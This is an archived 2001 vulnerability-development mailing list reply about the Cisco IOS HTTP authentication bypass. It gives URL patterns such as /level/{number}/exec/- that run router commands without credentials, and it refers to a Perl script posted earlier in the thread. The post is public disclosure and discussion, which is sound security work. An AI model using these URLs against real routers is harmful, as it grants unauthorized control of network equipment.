Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re[2]: Cisco IOS HTTP Configuration Exploit

From: Ertan Kurt <ertank () olympos org>
Date: Mon, 2 Jul 2001 12:37:26 +0300
BT> Does it mean that when i enter the URL i will not be prompted to enter the username and password??

Yes, just use the perl script (check previous mail) on a http server enabled cisco
router and if it says smtg like:
Vulnerable with {number}
just use that number as shown below:
http://routerIP/level/{number}/exec/-
or send commands directly:
http:///routerIP/level/{number}/exec/-/sh/ip/interface/brief/CR

it will not ask you to provide a username and pass.

Regards,

Ertan Kurt

BT> -----Original Message-----
BT> From:    Ertan Kurt ertank () olympos org
BT> Sent:    Sun, 1 Jul 2001 12:52:00 +0300
BT> To:      vuln-dev () securityfocus com
BT> CC:      tamer () statu com tr
BT> Subject: Fwd: Cisco IOS HTTP Configuration Exploit


BT> Hi,

BT> This does not work! What does this tool do really??
BT> I tried on several vulnerable routers but your tool gave errors
***cut***
Previous By Date Next
Previous By Thread Next

Current thread: